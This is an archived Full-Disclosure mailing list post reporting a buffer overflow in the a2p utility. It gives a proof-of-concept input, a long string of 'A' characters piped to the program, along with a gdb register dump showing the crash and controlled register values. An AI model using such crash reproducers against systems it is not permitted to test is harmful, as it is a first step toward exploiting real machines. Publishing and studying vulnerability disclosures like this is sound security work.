lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 27 Dec 2014 22:58:37 +0100
Subject: [FD] /usr/bin/a2p buffer overflow

$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g'

I have found what it appears to be a buffer overflow on the a2p (awk2perl)
utility. It comes by default on several different systems.

Tested on Fedora 20, Fedora 19, Debian, and works probably on every other


[ ~]$ python -c "print 'A' * 2048" | a2p >/dev/null
[ ~]$ python -c "print 'A' * 2049" | a2p >/dev/null
[ ~]$ python -c "print 'A' * 2050" | a2p >/dev/null
Segmentation fault


[ ~]$ python -c "print 'A'*3000" > lel
[ ~]$ gdb a2p
(gdb) r lel
Starting program: /usr/bin/a2p lel
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/".

Program received signal SIGSEGV, Segmentation fault.
0x000000000040b7c5 in yyparse ()
(gdb) info reg
rax            0x4141414141414141        8680820740569200760
rbx            0x1        1
rcx            0x0        0
rdx            0x67d724        6805284
rsi            0x67dab0        6806192
rdi            0x41414141        2021161080
rbp            0x6        0x6
rsp            0x7fffffffe1d0        0x7fffffffe1d0
r8             0x8        8
r9             0x5f        95
r10            0x0        0
r11            0x38e0174b60        244277791584
r12            0x6        6
r13            0x0        0
r14            0x0        0
r15            0x0        0
rip            0x40b7c5        0x40b7c5 <yyparse+757>
eflags         0x10206        [ PF IF RF ]
cs             0x33        51
ss             0x2b        43
ds             0x0        0
es             0x0        0
fs             0x0        0
gs             0x0        0


This message was sent using IMP, the Internet Messaging Program.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists